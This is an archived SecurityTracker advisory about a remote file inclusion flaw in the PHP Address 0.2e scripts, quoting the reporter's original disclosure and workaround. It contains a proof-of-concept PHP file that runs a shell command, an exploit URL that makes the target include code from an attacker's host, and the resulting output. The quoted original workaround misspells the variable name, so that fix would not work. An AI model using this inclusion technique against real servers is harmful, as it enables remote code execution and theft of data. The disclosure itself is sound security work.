SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Address Vendors:   Huebsch, Chris
PHP Address Allows Remote Users to Execute Arbitrary PHP Code on the Server.
SecurityTracker Alert ID:  1004560
SecurityTracker URL:  http://securitytracker.com/id/1004560
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.2e
Description:   A vulnerability was reported in the PHP Address script collection. A remote user can execute arbitrary PHP code on the server.

The flaw reportedly resides in the 'global.php3' script where no default value is set for the '$LangCookie' variable. So, a remote user can create a malicious PHP file and post it to another serer, then specify the malicious PHP file for inclusion using the '$LangCookie' variable with following type of URL:

"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE"

A demonstration exploit script is provided:

------------x.php3------------
<?
passthru("/bin/ls /");
?>
-------------------------------

With this 'x.php3' exploit script posted to 'MYSERVER', the remote user can cause x.php3 to be executed on the target 'SERVER' with the following URL:

http://SERVER/globals.php3?LangCookie=http://MYSERVER/x

Impact:   A remote user can execute arbitrary PHP code on the server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

In the 'global.php3' file, add the line '$LangCookie = "";' as shown below:

<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch
(chu@informatik.tu-chemnitz.de)
$LangCookie = ""; // ADD THIS LINE
if ($LangCookie)
require("$LangCookie.php3"); // Line 5
...

Vendor URL:  phpaddress.huebsch-gemacht.de/ (Links to External Site)
Cause:   Configuration error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: PHP Address Allows Remote Users to Execute Arbitrary PHP Code on the Server.
The vendor issued a fix.



 Source Message Contents

Subject:  PHP source injection in PHPAddress


PHP source injection in PHPAddress

Description

PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaing a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/

Workaround

Change the global.php3 file so it looks like this:
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch
(chu@informatik.tu-chemnitz.de)
$LanCookie = "";      // THIS LINE
if ($LangCookie)
  require("$LangCookie.php3");  // Line 5
...

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests an url like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
able to include any file he wants.

Example

I putted a PHP script on my server wich I wanted to include:

------------x.php3------------
<?
    passthru("/bin/ls /");
?>
-------------------------------

then i requested this url:
http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is allready there look at line 5 in global.php3)

------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var
------------------------------

Note that any PHP code could be included, malicious users could get access
to database
passwords, personal information, ...

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC